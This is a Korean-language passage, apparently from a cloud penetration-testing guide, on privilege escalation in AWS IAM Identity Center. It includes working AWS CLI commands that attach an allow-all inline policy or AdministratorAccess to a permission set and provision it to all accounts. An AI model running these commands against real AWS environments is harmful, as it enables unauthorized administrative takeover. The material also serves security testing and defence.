기본적으로 Management Account에서 권한이 있는 사용자만 IAM Identity Center에 접근하고 제어할 수 있습니다.
다른 계정의 사용자는 해당 계정이 Delegated Administrator인 경우에만 허용할 수 있습니다.
자세한 내용은 문서를 확인하세요.
비밀번호 재설정
이와 같은 경우 권한을 상승시키는 쉬운 방법은 사용자의 비밀번호를 재설정할 수 있는 권한을 갖는 것입니다. 불행히도 사용자의 비밀번호를 재설정하기 위해 이메일을 보내는 것만 가능하므로 사용자의 이메일에 접근해야 합니다.
identitystore:CreateGroupMembership
이 권한을 사용하면 사용자를 그룹에 추가하여 그룹이 가진 모든 권한을 상속받을 수 있습니다.
이 권한을 가진 공격자는 자신의 통제 하에 있는 사용자에게 부여된 Permission Set에 추가 권한을 부여할 수 있습니다.
# Set an inline policy with admin privilegesaws sso-admin put-inline-policy-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --inline-policy file:///tmp/policy.yaml
# Content of /tmp/policy.yaml{"Version":"2012-10-17","Statement": [{"Sid":"Statement1","Effect":"Allow","Action": ["*"],"Resource": ["*"]}]}# Update the provisioning so the new policy is created in the accountaws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS
이 권한을 가진 공격자는 자신의 통제 하에 있는 사용자에게 부여된 권한 세트에 추가 권한을 부여할 수 있습니다.
# Set AdministratorAccess policy to the permission setaws sso-admin attach-managed-policy-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --managed-policy-arn "arn:aws:iam::aws:policy/AdministratorAccess"
# Update the provisioning so the new policy is created in the accountaws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS
이 권한을 가진 공격자는 자신의 통제 하에 있는 사용자에게 부여된 Permission Set에 추가 권한을 부여할 수 있습니다.
이 경우 이러한 권한을 악용하려면 영향을 받을 모든 계정에 있는 고객 관리 정책의 이름을 알아야 합니다.
# Set AdministratorAccess policy to the permission setaws sso-admin attach-customer-managed-policy-reference-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --customer-managed-policy-reference <customer-managed-policy-name>
# Update the provisioning so the new policy is created in the accountaws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS
sso:CreateAccountAssignment
이 권한을 가진 공격자는 자신의 제어 하에 있는 사용자에게 계정에 대한 권한 세트를 부여할 수 있습니다.